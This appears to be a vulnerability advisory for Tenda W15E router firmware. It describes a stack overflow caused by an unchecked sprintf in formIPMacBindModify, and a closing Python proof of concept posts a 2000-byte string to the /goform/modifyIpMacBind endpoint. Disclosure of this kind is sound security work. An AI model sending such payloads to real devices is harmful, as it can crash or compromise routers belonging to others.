formIPMacBindModify.md

Overview

• Firmware download website: https://www.tendacn.com/download/detail-2722.html

Affected version

W15EV1.0 V15.11.0.14

Vulnerability details

The Tenda W15EV1.0 V15.11.0.14 firmware has a stack overflow vulnerability in the formIPMacBindModify function. The ruleIndex, ip, mac, remark variable receives the IPMacBindRuleId, IPMacBindRuleIp, IPMacBindRuleMac, IPMacBindRuleRemark parameter from a POST request. However, since the user can control the input of IPMacBindRuleId, IPMacBindRuleIp, IPMacBindRuleMac, IPMacBindRuleRemark , the statement

sprintf(
    (char *)tmp,
    "%s;1;%s;%s;name%d;%s",
    (const char *)ruleId,
    (const char *)ip,
    (const char *)mac,
    v6,
    (const char *)remark);

can cause a buffer overflow. The user-provided IPMacBindRuleId, IPMacBindRuleIp, IPMacBindRuleMac, IPMacBindRuleRemark can exceed the capacity of the tmp array, triggering this security vulnerability.

POC

import requests
from pwn import*

ip = "192.168.84.101"
url = "http://" + ip + "/goform/modifyIpMacBind"
payload = b"a"*2000

data = {

    	'IPMacBindRuleIp':payload,
    }
response = requests.post(url, data=data)
print(response.text)